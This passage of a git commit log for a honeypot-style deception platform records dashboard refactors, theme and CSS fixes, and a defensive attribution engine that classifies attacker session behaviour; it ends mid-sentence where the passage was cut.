f524d283b7 refactor(decnet_web/AttackerDetail): extract AttackerStats section
Lift the 5-up counter grid + the conditional scan-vs-interact row
into AttackerStats. The activity row's visibility predicate
collapses into a single boolean inside the section so the parent
no longer encodes UX rules.

- New AttackerDetail/sections/AttackerStats.tsx
- AttackerStats.test.tsx covers all-five counters, activity present,
  activity empty, and service_activity undefined paths.
2026-05-09 04:40:34 -04:00
653ae04e88 refactor(decnet_web/AttackerDetail): extract AttackerHeader section
Lift the header (IP, country tag, traversal badge, identity badge)
into its own section component. Tag helper moves to a shared
AttackerDetail/ui.tsx so future sections can reuse it without
re-importing through AttackerDetail.tsx.

- New AttackerDetail/sections/AttackerHeader.tsx (~50 LOC)
- New AttackerDetail/ui.tsx for shared presentational helpers
- AttackerDetail.tsx imports both; local Tag definition deleted
- AttackerHeader.test.tsx covers country present/absent,
  TRAVERSAL badge, IDENTITY click-through, identity null path
2026-05-09 04:39:30 -04:00
22cfb10617 refactor(decnet_web/AttackerDetail): extract data layer into useAttackerDetail
The AttackerDetail page body owned all 7 REST fetches plus 2 SSE
streams inline as 200+ lines of useEffect plumbing. Lift them into
a single hook so section components extracted in follow-up commits
consume typed values, not setState pairs.

- New ./AttackerDetail/types.ts holds the canonical AttackerData,
  BehaviouralObservation, AttributionPrimitiveState plus newly-named
  ArtifactLog / SessionLog / SmtpTargetRow / MailLog / CommandRow
  (previously inline anonymous types).
- New ./AttackerDetail/useAttackerDetail.ts owns:
  * GET /attackers/:id (404 -> ATTACKER NOT FOUND)
  * GET /attackers/:id/attribution (silent-tolerant)
  * GET /attackers/:id/commands paged with 422 alert preserved
  * GET /attackers/:id/{artifacts,smtp-targets,mail,transcripts}
    (mail surfaces a 403 boolean for the admin-gated viewer)
  * useAttackerStream + useIdentityStream subscriptions, including
    the live attribution-state-changed merge.
- AttackerDetail.tsx re-exports BehaviouralObservation /
  AttributionPrimitiveState so AttackerDetail.behaviour_panel.test
  and any future external importer keeps working unchanged.
- New useAttackerDetail.test.ts covers loading -> success, 404,
  paged commands offset, serviceFilter resets cmdPage, and mail 403
  via MSW handlers (the SSE hooks are vi.mock'd; jsdom can't host
  EventSource).

No behavior change for the rendered page; all 37 tests green.
2026-05-09 04:36:35 -04:00
07a7d4918c test(decnet_web): MSW-based test foundation for UI refactor
Phase 0 of the decnet_web refactor: stand up an MSW server, fixtures,
and a router-aware render helper so the upcoming god-component splits
(AttackerDetail first) can land with same-commit test coverage.

- msw devDep + setupServer wired into src/test/setup.ts
- src/test/server.ts re-exports server, http, HttpResponse, apiUrl()
- src/test/fixtures/{attacker,decky,canary,topology}.ts factories
- src/test/renderWithRouter.tsx wraps MemoryRouter + ToastProvider
- baseline coverage thresholds (0%) in vite.config.ts; raise per PR
- coverage/ added to decnet_web/.gitignore

Existing Orchestrator/AttackerDetail/ThemeLab tests stay on vi.mock
and continue to pass; new tests use MSW.
2026-05-09 04:30:51 -04:00
3318b15044 fix(decnet_web/Layout): theme toggle icon stays visible on hover
The global button:hover rule in index.css forces color: var(--bg)
+ matrix-glow on the lucide icon's currentColor stroke, making
the sun/moon icon disappear into the toggle button's tinted
background on hover. Pin color: var(--accent) and box-shadow:
none on .theme-toggle-btn:hover so the icon stays in its base
colour and the button doesn't pick up the wider button-hover
halo.
2026-05-09 04:18:48 -04:00
5a34b1846c fix(decnet_web/Layout): kill residual theme-swap open flash
Even with fill: 'both', the new pseudo paints once at its default
style (no clip-path = full size) before the JS animation
registers — the brief open flash that survived the previous fix.

Pre-publish click coords as --reveal-x / --reveal-y on <html>
before calling startViewTransition. The static CSS rule on
::view-transition-new(root) now sets clip-path: circle(0px at
var(--reveal-x) var(--reveal-y)) as the pseudo's default, so
the very first paint is already fully clipped. The animation
then grows the circle outward from there.
2026-05-09 04:17:50 -04:00
ccff1467b1 fix(decnet_web/Layout): outward theme reveal, no flash either end
ANTI prefers the new theme growing outward from the click point
(visually clearer cause-and-effect than the old theme burning
away). The original outward implementation flashed at the start
because the new pseudo defaulted to its computed style (no
clip-path = fully visible) for one frame before the JS animation
registered.

Switching the animation's fill from 'forwards' to 'both' enforces
the start keyframe (circle(0) at click point) before the first
paint, in addition to pinning the end keyframe through pseudo
teardown. New layer is invisible until the animation begins,
fully visible until cleanup. No flash either end.
2026-05-09 04:17:07 -04:00
6d1fc3a081 fix(decnet_web/Layout): theme swap end-of-animation flash
Without fill: 'forwards' the clip-path keyframes release at
animation end and the pseudo reverts to its computed style
(no clip-path), so the old layer flashes back at full size for
a frame before View Transitions tears the pseudo-elements down.
Pinning the final keyframe with fill-forwards keeps the old
layer fully clipped through to teardown.
2026-05-09 04:15:44 -04:00
a81ea3f973 fix(decnet_web/Layout): theme swap animation no longer flashes opposite mode
Growing the NEW theme layer from circle(0) outward leaves a
one-frame gap where the new pseudo is fully opaque at full size
(the default state) before the clip-path animation registers.
Result: a flash of the destination theme right before the
reveal starts.

Inverted the layering and animation direction:
 - NEW theme snapshot sits on the bottom (z-index 0), static
 - OLD theme snapshot sits on top (z-index 1), shrinks via
   clip-path from circle(N) at click point down to circle(0)

The new layer is now hidden behind the old one until the old
shrinks away — no flash possible because the new layer was
never visible before the animation. Same 520ms duration, same
ease curve, same direction-of-travel from the user's POV
(circle expanding from cursor).
2026-05-09 04:14:54 -04:00
438a6e3e45 feat(decnet_web/Layout): topbar dark/light toggle with circular reveal
User-facing theme toggle ships now that the design system has
been audited end-to-end. A Sun/Moon button lives between the
threat indicator and the SYSTEM status pill in the topbar — same
slim 28x28 voice as the rest of the topbar controls, no chrome
shouting at the user.

Click coords drive a View Transitions API circle clip-path that
grows from the cursor to the farthest viewport corner over 520ms
with the project's standard --ease curve. Browsers without
startViewTransition (older Firefox, Safari < 18) fall through to
an unanimated swap — the hook returns instantly in that case.

Persistence is two-tier:
 - localStorage decnet_theme — the user's saved preference, the
   thing the topbar toggle writes. Survives reloads, applies
   everywhere.
 - sessionStorage decnet_theme_lab — dev-mode lab override (Task
   3). Tab-scoped, wins on boot so devs can A/B without nuking
   the saved preference.

App.tsx hydrates both on first mount in the right order so the
correct theme is on <html> before the first paint.

useThemeToggle is a small hook in lib/ rather than a Layout-only
helper so the same toggle can be reused later from a settings page
or hotkey.
2026-05-09 04:01:24 -04:00
9cab37db3a fix(decnet_web/css): three light-mode dimness fixes
--dim-color and --danger-color were referenced across drawers and
RemoteUpdates but never defined; --dim-color silently inherited
(defeating its purpose) and --danger-color fell back to literal
#f88 salmon (the 'ugly red' WifiOff icon next to UNREACHABLE
hosts). Added both as aliases in :root: --dim-color = var(--fg-3),
--danger-color = var(--alert).

--fg-2/3/4 alphas in light mode were tuned identical to dark
(0.78/0.55/0.35), but ink-on-cream needs more punch than
matrix-on-black at the same alpha — the deploy preview code
block (.code-block .comment / .key) and every dim caption
rendered too faint. Bumped to 0.88/0.70/0.50.

.maze-net-box.inactive applies opacity 0.42 + grayscale(0.7) for
the 'no traffic' signal. On cream that fades the LAN out of
visibility entirely. Override in light mode keeps the dotted
border as the dim-state cue and bumps opacity to 0.85 so the
header text stays legible.
2026-05-09 03:56:06 -04:00
388a968d89 fix(decnet_web/css): sweep violet rgba literals to tokens
Credentials drawer code-block labels (printable:, b64:) and a
dozen other violet wash/tint sites still carried bare rgba(238,
130, 238, *) literals — bright magenta in light mode where
--violet has resolved to charcoal-purple #2d1b4e. Mirrors the
prior matrix/alert/warn/info sweeps: by-alpha buckets land on
var(--violet-tint-10) or var(--violet).
2026-05-09 03:50:29 -04:00
aa0b22aacb fix(decnet_web/css): sweep rgba colour literals to tokens app-wide
Pre-this-commit, ~80 rgba() literals across 24 files were
hardcoding alert-red, warn-amber, info-cyan, panel-dark, and
white-text-with-alpha shades that bypassed the token cascade.
Net effect in light mode: the .eml/SESSREC drawers, AttackerDetail
verdict pills, MazeNET net-box headers, OPEN/REPLAY action
buttons, threat-intel cards, and all the dim 'whitish' overlays
stayed on their dark-mode hex values, producing the unreadable
panels in the screenshots.

Sweep maps each rgba colour family onto the existing token by
alpha bucket — rgba(13,17,23,*) -> var(--panel),
rgba(255,65,65,*) -> var(--alert)/-tint-10,
rgba(255,170,0,*) and rgba(224,160,64,*) -> var(--warn)/-tint-10,
rgba(0,200,255,*) -> var(--info)/-tint-10,
rgba(255,255,255,*) -> var(--fg-N)/var(--matrix-tint-N) by alpha.

VERDICT_TONE in AttackerDetail (MALICIOUS/SUSPICIOUS/BENIGN/
NO SIGNAL) was the worst offender — string literals
'#ff4d4d'/'#ffae42'/'#5fd07a'/rgba(255,255,255,0.4) baked into
inline JS styles. Now resolves at render time via var(--alert)/
var(--warn)/var(--ok)/var(--fg-4).

New tokens in :root:
 - --bg-color (alias of --bg) — drawers used this name with
   #0d1117 fallback that fired in every browser because nothing
   defined --bg-color. Adding the alias makes drawers re-tone.
 - --info / --info-tint-10 / --info-tint-30 — REPLAY buttons and
   any future neutral-secondary use.
 - --ok — semantic alias for 'verified good' (matrix in dark,
   emerald in light) so BENIGN pills stay readable across themes.

Login.css left intentionally — pre-auth surface, not themed.
2026-05-09 03:48:05 -04:00
11b2da7d54 fix(decnet_web/css): light-mode contrast across wizards, code blocks, hovers
Sweeps four invariant violations that were leaking dark surfaces
into light mode and producing the unreadable / inverted areas:

  1. Hardcoded `color: #000` in 14 :hover rules across 11 CSS
     files swapped to `color: var(--bg)` — collapses to #000 in
     dark mode (no-op), becomes cream in light. Fixes DEPLOY
     DECKIES (button hover was rendering charcoal-purple text on
     charcoal-purple background).
  2. Hardcoded `background: #000` (3 sites) and `#0d1117`
     (3 sites) replaced with `var(--bg)` / `var(--panel)`. Fixes
     code blocks and modal panels staying dark on cream — the
     deploy-wizard preview, topology-creation NAME input, and the
     MazeNET canvas backdrop now follow the active theme.
  3. `rgba(0,0,0,0.35)` and `rgba(0,0,0,0.5)` input/card
     backgrounds (ServiceConfigForm, DeckyFleet .input)
     swapped to `var(--panel)`. Fixes per-service config rows
     in the deploy wizard rendering as dark slabs.
  4. SVG arrow markers in MazeNET Canvas.tsx hardcoded
     `fill="#00ff41"` / "#ee82ee" — replaced with currentColor +
     style hook so they re-resolve on theme change.

New behaviour: light-mode hovers tint instead of inverting. The
dark-mode rules fully fill bg with --matrix/--violet/--alert and
flip text to --bg; that lands cream-on-near-ink in light mode
and reads as a jarring colour inversion every cursor move. Light
mode now layers a *-tint-10 background and keeps text in its
base colour. Single override block in index.css targets every
scoped `.X-btn`/`.btn`/`button:hover` via :is() + [class*="-btn"]
so we don't have to chase every component file.
2026-05-09 03:43:47 -04:00
34c778277a refactor(decnet_web/css): promote hardcoded matrix/warn/crit colours to tokens
37 bare rgba(0, 255, 65, ...) literals across 10 component CSS
files were forcing matrix-green to bleed into light mode no matter
what data-theme=light overrode in :root. They're now mapped onto
existing tokens by alpha bucket (0.025-0.05 -> --matrix-tint-5,
0.08-0.10 -> --matrix-tint-10, 0.18-0.30 -> --matrix-tint-30,
0.4 -> --fg-4, 0.5-0.6 -> --fg-3, 0.7-0.8 -> --fg-2).

Adds --warn (#e0a040), --amber (alias of --warn), --crit
(#e74c3c), and their tint-10 variants to :root, with
ink-friendly light-mode overrides. Sweeps bare #ffaa00 / #e0a040
/ #f59e0b / #ff4d4d / #e74c3c usages in the same files onto the
new tokens.

Files with var(--token, #fallback) patterns left alone — those
were already token-driven and the fallbacks just provide safety.
Login.css and inline TSX hex left for the per-page sweep.
2026-05-09 03:36:04 -04:00
df0c8e12e7 fix(decnet_web/css): light theme goes ink-monotone, not green-on-cream
Initial light-theme palette kept --matrix as a darker emerald
and --violet as a darker purple, which washed out badly on
warm cream — auth-helper chips, ACTIVE/PASSIVE/INACTIVE pills,
and CREDS/REUSE tabs all became unreadable because their tint
backgrounds + low-saturation text collapsed to sludge.

Light mode now collapses --matrix and --violet to near-ink
shades (#0d0d0d and #2d1b4e). --alert stays the one
saturated colour — the only element allowed to shout.
Dark mode is untouched; the matrix-vibe identity stays
exclusive to dark.

Also collapses the matrix/violet accent knob in light mode:
data-accent only flavours dark mode now, since two ink
shades are visually identical.
2026-05-09 03:31:18 -04:00
47c57271e7 feat(decnet_web/theme-lab): light theme tokens + dev toggle
Adds html[data-theme="light"] block to index.css overriding the
core six tokens (bg, matrix, violet, panel, border, alert), the
matrix/violet/alert tints, and the foreground opacity ramp to a
cream-on-ink palette anchored on #dbdad6. Glows are no-op'd —
light mode trades neon haloes for hard 1px borders.

Lab page gets a Dark/Light toggle that flips
html.dataset.theme and persists to sessionStorage
(decnet_theme_lab) — intentionally tab-scoped, not user-facing.
App.tsx hydrates the same key on boot so a tab reload keeps the
dev's chosen theme. The user-facing localStorage toggle ships
later via Config.
2026-05-09 03:23:50 -04:00
f3f7bff717 feat(decnet_web/theme-lab): kitchen-sink component zoo
Renders every primitive in the design system on the lab page so
theme-token edits can be evaluated against all states at once:
colour swatches with WCAG contrast vs --bg, the full type scale,
buttons (5 variants × default/hover/disabled), badges and status
pills, info/error banners, metric cards, table rows
(default/hover/selected/drop-target), form inputs, drawer panel
sample, and net-box compose states (internet/inactive/selected/
drop-target — independent classes layering, per memory).

Wrapper uses .fleet-root so global .btn/.btn.violet/etc resolve
identically to real pages. Lab-local CSS owns layout only — every
colour comes from index.css tokens.
2026-05-09 03:22:21 -04:00
846a50dbbf feat(decnet_web/theme-lab): scaffold dev-gated /theme-lab route
Adds VITE_DECNET_DEVELOPER build-time gate: when unset, the
isDeveloperMode() helper collapses to a constant false and Vite
tree-shakes both the lazy import and the conditional <Route> out
of the prod bundle.

ThemeLab is currently a header stub; subsequent tasks fill it
with the design-system primitive zoo plus a Dark/Light toggle
for live token tuning. Route is intentionally absent from
ROUTE_LABELS / sidebar — direct URL only.
2026-05-09 03:18:34 -04:00
65ddaaa681 fix(behave_shell/F.0): tighten prompt detector — log lines ending in '>' no longer vote
_detect_prompt_suffix accepted ANY line ending in $#%> as a PS1 prompt,
so a single `cat /var/log/dpkg.log` (195 lines closing in `<none>`)
flooded environmental.shell_type votes and flipped a plainly-bash
session to fish.

A prompt line now requires either a trailing space after the suffix
(default PS1 shape across bash/zsh/fish/PowerShell) or a PS1-shape
token (user@host, "PS " prefix, or a Windows drive-letter prefix).

Regression tests pin the dpkg.log false-positive and a $-terminated
prose line.
2026-05-09 02:57:40 -04:00
0c1fc68b13 feat(deploy): wire attribution worker — CLI + systemd unit + registry
* decnet attribution — Typer command mirroring decnet reuse-correlate
  (--multi-actor-tick, --daemon flags). Calls run_attribution_loop
  with the dependency-injected repo.
* deploy/decnet-attribution.service.j2 — systemd unit mirroring
  decnet-reuse-correlator.service.j2: ExecStart=decnet attribution,
  same hardening posture (NoNewPrivileges, ProtectSystem=full,
  ProtectHome=read-only, dedicated /var/log/decnet/decnet.attribution.log).
* worker_registry.KNOWN_WORKERS += "attribution" — heartbeat already
  publishes as system.attribution.health from
  attribution_worker._WORKER_NAME, so the Workers panel surfaces the
  row the moment the unit is enabled.
* api_start_all_workers preferred-order list + "attribution" between
  reuse-correlator and enrich so a fresh start-all brings it up
  alongside its peers.

After this commit `systemctl enable --now decnet-attribution` (or
the dashboard's start-all) actually launches the engine.
2026-05-09 02:31:59 -04:00
5253b32319 feat(decnet_web/AttackerDetail): attribution state badges (Phase 6)
Per-primitive state badge rendered next to each value in the
Behavioural Primitives panel. Five-state vocabulary, frozen, mirrors
decnet/correlation/attribution/aggregate.py:

  * STABLE      — green, low-key
  * DRIFTING    — amber, draws the eye
  * CONFLICTED  — red
  * MULTI-ACTOR — purple, loudest (cross-primitive escalation lives
                  in attribution.multi_actor_suspected, not the
                  per-primitive badge)
  * UNKNOWN     — neutral border, no fill

Wiring:

* GET /api/v1/attackers/{id}/attribution on mount + on id change.
  Failures swallowed silently (the worker may be off in dev).
* useAttackerStream gains attribution.state_changed +
  attribution.multi_actor_suspected named events. The state-changed
  handler merges by primitive and locks last_change_ts when the
  state did not actually flip (defensive — backend already gates
  these on transition, but a future relaxation shouldn't lie about
  "stable since X" on the badge tooltip).
* multi_actor_suspected is wired but unused by the badges; the
  per-primitive multi_actor signal already shows on each contributing
  primitive. The handler is in place so a future "two operators
  detected" banner has a live source.

Vitest: 4 new tests (badge renders only for mapped primitives, all
five states render with distinct labels, no badge when prop omitted)
on top of the existing 4. 7 of 7 pass; tsc + vite build clean.
2026-05-09 02:28:11 -04:00
5de4b5e290 feat(decnet_web/AttackerDetail): visual refresh of Behavioural Primitives panel
* Per-domain icons (Keyboard / Cpu / Clock / Activity / Globe / Sparkles).
* Domain headers use BEHAVIOUR_DOMAIN_LABELS with letter-spacing +
  primitive-count badge on the right.
* Bordered domain groups instead of flat list; aligned leaf / value /
  confidence columns with monospace value rendering.
* Section title: BEHAVIOURAL PRIMITIVES -> BEHAVE PRIMITIVES (matches
  the BEHAVE-SHELL extractor naming).
2026-05-09 02:24:37 -04:00
9cc3272a0d test(correlation/attribution): v0 calibration lockdown (Phase 7)
Four synthetic operator-behaviour scenarios at the merger level
(aggregate_observations) that pin v0's calibration:

* Stable HUMAN over 7 sessions   -> all primitives stable
* HUMAN switches to LLM mid-week -> primitives flip stable -> drifting
* Two operators alternating      -> primitives flag multi_actor
                                    (per-primitive; the cross-
                                    primitive multi_actor_suspected
                                    correlator is exercised by Phase 5)
* Single short session           -> all primitives unknown

Plus a threshold-lockdown test that asserts every named constant in
_thresholds.py against its v0 ship value. Anyone adjusting a
threshold without updating the scenarios fails this file.

This closes DEBT-051 at v0 — the attribution engine has a calibrated,
test-locked answer to "is this attacker stable / drifting / showing
multiple operators?" without crossing the persona-attribution bright
line. v1 (cross-attacker clustering, KD simhash linkage signal) is
gated on this v0 surface being stable in production for >= 1 month.
2026-05-09 02:23:10 -04:00
33f7d5a9ff feat(web): expose attribution state on AttackerDetail backend (Phase 6)
GET /api/v1/attackers/{uuid}/attribution

Returns the merger output for an attacker's identity:

    {
        "identity_uuid": "abc..." | null,
        "primitives": [
            {primitive, current_value, state, confidence,
             observation_count, last_change_ts, last_observation_ts},
            ...
        ]
    }

Pre-attribution-worker: identity_uuid=null, primitives=[]. Surfacing
identity_uuid keeps the cross-attacker rollup story visible to the
frontend ahead of v1's clusterer landing.

api_events SSE relay also subscribes to attribution.> and forwards
to the AttackerDetail page filtered on payload.identity_uuid (the
identity is resolved at stream open from the URL's attacker_uuid;
attribution payloads are identity-keyed, not attacker-keyed). New
SSE event names: attribution.state_changed,
attribution.multi_actor_suspected.

Frontend (AttackerDetail.tsx badge rendering, useAttackerStream
consumer) deferred — there's already WIP on AttackerDetail.tsx in
the working tree; merging the badge logic is a separate commit
once that lands.

Tests: 4 endpoint scenarios — 401 unauth, 404 unknown attacker,
200 empty (no stub), 200 with primitive-ordered rows.
2026-05-09 02:21:59 -04:00
e2c7e16793 feat(correlation/attribution): cross-primitive multi-actor detection (Phase 5)
Add tick_multi_actor() — periodic walk of attribution_state firing
attribution.profile.multi_actor_suspected when an identity carries
>= MULTI_ACTOR_MIN_PRIMITIVES rows in multi_actor state.

* Repo's list_multi_actor_identities() already filters to >= 2
  primitives; the correlator just dispatches.
* In-memory dedup keyed on identity_uuid -> frozenset(primitives):
  same set as last fire -> no re-emit. Set grows -> re-emit.
  Set shrinks below threshold -> evict so a future re-flap re-fires.
  Restart-resets are honest because attribution_state persists; a
  v1 multi_actor_suspect_log table can replace this if needed.
* run_attribution_loop() now supervises three concurrent tasks:
  observation handler, multi_actor tick loop, health/control. Tick
  interval comes from _thresholds.MULTI_ACTOR_TICK_SECS (60s) with
  test override.

Tests: 6 scenarios — single-primitive doesn't fire, two-primitive
co-flag fires, dedup blocks unchanged set, set growth re-fires,
threshold drop re-arms, multiple identities fire independently.
2026-05-09 02:18:42 -04:00
dd265d7520 feat(correlation/attribution): wire bus handler, persist state (Phase 4)
attribution_worker.handle_observation_event now executes the full
end-to-end path:

* ensure stub identity (Phase 1)
* observations_for_identity_primitive() — new repo helper joining
  observations through attackers.identity_id, so v1's clusterer
  gets cross-attacker rollup for free
* aggregate_observations() with ValueKind dispatched off the BEHAVE
  PRIMITIVE_REGISTRY; unknown primitives default to categorical
* upsert_attribution_state() — last_change_ts locked when state is
  unchanged so the dashboard can render "stable since X"
* publish attribution.profile.state_changed only on transition;
  idempotent re-runs over the same observation set fire nothing
  (loop-prevention invariant matching ttp.tagged)

Tests:
* 5 end-to-end attribution scenarios over in-memory SQLite + FakeBus.
* test_base_repo's DummyRepo + coverage body now stub every abstract
  surface BaseRepository declares — the 6 added by this branch plus
  the 12 left un-stubbed by earlier work (BEHAVE Phase 1, TTP
  rollups, iter helpers). The coverage test could not previously
  even instantiate.
* test_aggregate_categorical's dispatcher rejection updated for the
  Phase 3 + 4 contract — ValueError on unknown kinds, not
  NotImplementedError.
2026-05-09 02:16:12 -04:00
c39802a4bb feat(correlation/attribution): hash + numeric merge functions (Phase 3)
aggregate_numeric(): EWMA + dispersion (CV) over numeric primitive
values. Stable when CV < 20% AND mean shift < 30%; drifting on >= 30%
mean shift; conflicted on CV > 100%. Confidence is 1 - min(CV, 1).
multi_actor is intentionally NOT a numeric state — bimodal
distributions belong to the categorical detector once the value space
is bucketed.

aggregate_hash(): counts distinct hash values within
HASH_DRIFT_WINDOW_SECS of the most recent observation. 0 rotations =
stable, 1..HASH_DRIFT_MAX = drifting, > HASH_DRIFT_MAX = conflicted.
Reads rotation events; never recomputes hashes (DEBT-032 already
produces them via decnet.correlation.fingerprint_rotation).

aggregate_observations() dispatcher now routes "categorical" |
"numeric" | "hash" | None and rejects unknown kinds with ValueError
(louder than NotImplementedError now that all three v0 mergers
exist). 17 synthetic-input tests cover both new mergers and the
dispatcher.
2026-05-09 01:59:11 -04:00
4956977739 feat(correlation/attribution): categorical merge state machine (Phase 2)
aggregate_categorical(): pure function over a per-(identity, primitive)
observation list. Five-state vocabulary, last-N=5 window comparison
with one-outlier-tolerant majority threshold:

* unknown — < 3 observations
* stable — recent 5 agree (≥ 4 of 5 share top value), older 5 same
* drifting — recent 5 stable but disagrees with older 5, or older
  was conflicted and recent stabilised
* conflicted — recent 5 split, no two-value alternation pattern
* multi_actor — recent 5 split + alternation between exactly two
  values (operator A↔B handoff). Confidence capped at 0.6 per
  _thresholds.MULTI_ACTOR_MAX_CONFIDENCE; flapping primitives on
  flaky networks would otherwise look like two operators.

aggregate_observations() dispatcher honours value_kind="categorical"
(or None) and raises NotImplementedError for "numeric" / "hash" so
Phase 3 lands cleanly. 14 synthetic-input tests cover every state
+ boundary condition.
2026-05-08 23:18:22 -04:00
c2891d6cca feat(correlation/attribution): substrate + idle handler (Phase 1)
v0 Phase 1 of ATTRIBUTION-ENGINE.md:

* AttributionStateRow SQLModel keyed on (identity_uuid, primitive)
  per ANTI direction — re-keying state rows when the v1 clusterer
  merges attackers is the migration debt v0 should not bake in.
  ATTRIBUTION-ENGINE.md updated with the deviation note.
* AttributionMixin: ensure_stub_identity_for_attacker, idempotent
  upsert_attribution_state, get_attribution_state[_for_identity],
  list_multi_actor_identities (the Phase 5 correlator's read).
* attribution.profile.{state_changed,multi_actor_suspected} bus
  topics + builder; wiki Service-Bus.md updated separately.
* attribution_worker.py: subscribes to attacker.observation.>,
  ensures stub identity per event, logs and continues. No merger,
  no state writes, no derived events — Phase 4 wires those.
* attribution/{aggregate.py,_thresholds.py} skeletons: Phase 2
  fills _aggregate_categorical, Phase 3 adds numeric+hash+dispatcher.
2026-05-08 23:16:13 -04:00
e94ab608d9 fix(profiler/behave_shell): tolerate non-UTF-8 bytes in shard reads
Real-world bug surfaced on the first live decky run: sessrec.c's
json_escape (decnet/templates/_shared/sessrec/sessrec.c:111-141)
only escapes bytes < 0x20 + DEL — bytes >= 0x80 pass through raw.
An attacker pasting Latin-1 / GB18030 / any non-UTF-8 8-bit text
yields a shard line that chokes Python's default UTF-8 text-mode
read with 'utf-8 codec can't decode byte 0xac'.

Three changes:

1. _events_for_sid now opens with errors='surrogateescape', preserving
   byte fidelity through the JSON parse. Surrogate-half chars
   correctly fail isascii() / isalpha() so the typed-letter
   histograms filter them out automatically. Tightening sessrec.c to
   escape >= 0x80 is filed for v0.2 — that's the proper forensic-data
   fix; the surrogateescape read makes the engine robust meanwhile.

2. Regression test
   (test_handler_tolerates_non_utf8_bytes_in_shard) builds a shard
   with raw 0xAC bytes inside a JSON 'data' string and asserts the
   handler still persists observations.

3. Collector's _emit_session now logs at WARNING (was DEBUG) when
   find_shard_with_sid returns None, citing the three usual causes
   (ARTIFACTS_ROOT perms, _SERVICE_RE whitelist, sessrec/collector
   race). Surfaces the silent-skip class of bug in seconds instead of
   hours — the first live run hid a perm mismatch
   (User=anti without SupplementaryGroups=decnet) for an entire
   session window before the symptom was traced upstream.
2026-05-08 22:52:46 -04:00
69c8cfd2b9 test(profiler/behave_shell): Phase 6 smoke harness + live-decky runbook
Two-half deliverable per BEHAVE-INTEGRATION.md §587-594:

* scripts/behave_shell/replay_calibration.py — Python helper that
  drives the production handler against one asciinema shard, mints
  a temp SQLite repo + an Attacker per session, captures bus
  emissions in-process. Exits non-zero on zero-observation sessions.

* scripts/behave_shell/smoke.sh — bash entry that replays all five
  2026-05-02 calibration shards (HUMAN / YOU-sim / LW-sim /
  CLAUDE-FF / CLAUDE-CL). Auto-activates .311 venv, forces
  DECNET_DB_TYPE=sqlite, prints per-class summary. Suitable for CI.

* scripts/behave_shell/README.md — runbook covering both halves.
  Pins the manual live-decky procedure (one SSH session per class
  against a deployed smoke-decky, expected dominant primitives table,
  SQL verification query, AttackerDetail panel check, pass criteria).

* BEHAVE-INTEGRATION.md — Phase 6 completion log appended with
  current corpus results table (15 sessions, 424 observations across
  the five classes) and a note that the v0 tag (drop -pre) is gated
  on the manual live-decky round-trip and lands as a separate
  commit.

Live-decky run is intentionally NOT scripted — the integration doc
calls for manual SSH sessions per class so an operator confirms the
bus / collector / disk-reach plumbing under real PTY conditions.
2026-05-08 21:42:11 -04:00
b3ff80d74e test(decnet_web): vitest coverage for Behavioural primitives panel
Four tests pin the panel surface:
* Empty-state placeholder renders when no observations.
* Day-one priority primitives sort to the top of their group:
  motor.input_modality first in motor; the three cognitive priority
  primitives in documented order at the top of cognitive.
* Each row renders primitive leaf, value, and confidence-percent
  badge.
* Groups follow the canonical domain order
  (motor / cognitive / temporal / operational / environmental /
  emotional_valence); unknown domains alphabetise at the end.

Mirrors the Orchestrator.test.tsx harness shape (DEBT-043). Live
update path (useAttackerStream → setObservations) is exercised
indirectly via the static render — the hook is dumb glue and the
state mutation is React-side.
2026-05-08 20:27:40 -04:00
7634e31e5a feat(decnet_web/AttackerDetail): Behavioural primitives panel
Adds the AttackerDetail.tsx panel that surfaces BEHAVE-SHELL
behavioural primitives. Hydrates from the existing
GET /api/v1/attackers/{uuid} response field 'observations',
live-updates via the new useAttackerStream hook (replace-by-primitive
on every 'observation' SSE event).

* New BehaviouralPrimitivesPanel component, exported for vitest.
* Day-one render priority per BEHAVE-INTEGRATION.md §441-454:
  motor.input_modality, cognitive.feedback_loop_engagement,
  cognitive.command_branch_diversity,
  cognitive.inter_command_latency_class — these four sort to the top
  of their respective groups; everything else alphabetises.
* Grouped by top-level domain (motor / cognitive / temporal /
  operational / environmental / emotional_valence) with the canonical
  domain order; unknown domains alphabetise at the end.
* AttackerData interface gains an 'observations' field.
* Empty-state placeholder when the panel has nothing yet.
* Section collapse state extends to 'behavioural', defaults open.

tsc --noEmit clean. Vitest coverage ships in P5.4.
2026-05-08 20:26:55 -04:00
2ff2537f6c feat(decnet_web): useAttackerStream React hook
Per-attacker SSE consumer hook. Mirrors useIdentityStream's shape:
* Connects to /api/v1/attackers/{uuid}/events with ?token= auth.
* Per-event-name dispatch via addEventListener for snapshot,
  observation, fingerprint.rotated, attacker.scored.
* Reconnect-on-error backoff (3s).
* Callback refs so consumer rerenders don't tear down the connection.

The 'observation' event handler receives every primitive's update
through one event name; the primitive rides in payload.primitive
(matches the backend's _sse_name_for collapse decision).

Hook coverage rides on P5.4's panel test.
2026-05-08 20:24:19 -04:00
bb77d13f9a feat(api/attackers): per-attacker SSE events stream
GET /api/v1/attackers/{uuid}/events streams behavioural events for
one attacker. Mirrors decnet/web/router/topology/api_events.py
end-to-end: ?token= auth, require_stream_viewer gate,
sse_connection_slot per-user cap, snapshot-on-connect, three bus
subscriptions (attacker.observation.>, attacker.fingerprint_rotated,
attacker.scored) merged through asyncio.Queue, 15s keepalive,
request.is_disconnected() exit, finally task cancellation.

Per-attacker filter keys on payload['attacker_uuid'] which the
profiler worker stamps onto every published payload (Phase 5 P5.0
amendment) — O(1) drop without a repo round-trip per event.

_sse_name_for derives SSE event names:
  attacker.observation.<primitive> → observation.<primitive>
  attacker.fingerprint_rotated     → fingerprint.rotated
  attacker.scored                  → attacker.scored

10 tests cover snapshot, live forward, per-attacker filter (drops
other attackers' events), fingerprint.rotated forward, 404, 401, and
the sse-name derivation across all four cases. Topology events
regression green.
2026-05-08 20:23:29 -04:00
5116023bf7 feat(profiler/behave_shell): stamp attacker_uuid on bus payload (Phase 5 prep)
The profiler worker's per-observation publish now re-merges
attacker_uuid into the bus payload alongside id/ts/v. Same shape as
the existing DECNET-side deviation from BEHAVE's wire-format
docstring (BEHAVE-INTEGRATION.md §339-366) — widens the deviation
by one DECNET denorm field.

Phase 5's per-attacker SSE route can now filter
attacker.observation.* events to one attacker in O(1) without a repo
round-trip per event. identity_ref stays None today (until the
attribution engine ships); attacker_uuid is independent.

Two test changes:
* test_happy_path_persists_and_publishes asserts attacker_uuid is in
  every published payload.
* New test_attacker_uuid_in_payload_for_filter pins the field
  explicitly and confirms it doesn't conflate with identity_ref.
2026-05-08 20:18:32 -04:00
5ff89eefe7 feat(profiler): wire BEHAVE-SHELL extraction onto attacker.session.ended
The profiler worker now consumes attacker.session.ended on the bus
AND walks unprofiled session_recorded log rows on every tick. Both
